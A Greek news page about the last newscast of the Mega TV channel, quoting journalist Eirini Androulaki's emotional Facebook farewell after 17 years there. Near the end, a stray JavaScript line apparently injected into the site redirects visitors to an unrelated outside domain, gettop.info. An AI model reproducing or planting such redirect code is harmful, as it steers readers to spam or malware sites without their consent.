Ειρήνη Ανδρουλάκη για το τελευταίο δελτίο: Καλή αντάμωση Megaλη μου οικογένεια

0
84

 

Συγκίνηση και θλίψη έχει «γεμίσει»το διαδίκτυο από τις αναρτήσεις των δημοσιογράφων του Mega καθώς βγήκε στον αέρα το τελευταίο δελτίο ειδήσεων στην ιστορία του καναλιού. Μετά την πρώτη έκπληξη και το σοκ του ξαφνικού τέλους δημοσιογράφοι από όλα τα μέσα εκφράζουν τη συμπαράσταση τους στους συναδέλφους τους του άλλοτε μεγάλου καναλιού.

Η Ειρήνη Ανδρουλάκη που εδώ και 17 χρόνια ανήκε στη δημοσιογραφική «οικογένεια» του Mega σε ανάρτηση της στο Facebook έγραψε:

Στάθηκα τυχερή! Από τα πρώτα βήματα μου στη δημοσιογραφία σε ηλικία 18 ετών, ονειρευόμουν να δουλέψω στο Μεγάλο κανάλι και τα κατάφερα! Στάθηκα τυχερή γιατί είχα διευθυντές σκληρούς αλλά πραγματικούς δασκάλους. Γιατί συνύπηρξα με κορυφαίους δημοσιογραφους, οι οποίοι μου άνοιξαν ορίζοντες. Γιατί δημιούργησα σχέσεις ζωής, δοκιμασμένες στο χρόνο. Γιατί απέκτησα μια αδερφή που πάντα ήθελα να έχω. Θα θυμάμαι για πάντα με πολύ αγάπη τα 17 χρόνια στο Mega. Θέλω όμως να ξεχάσω τους τελευταίους μήνες που με γέμισαν με πόνο και θλίψη από τα ψέματα και την κοροϊδία. Καλή αντάμωση Megaλη μου οικογένεια.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here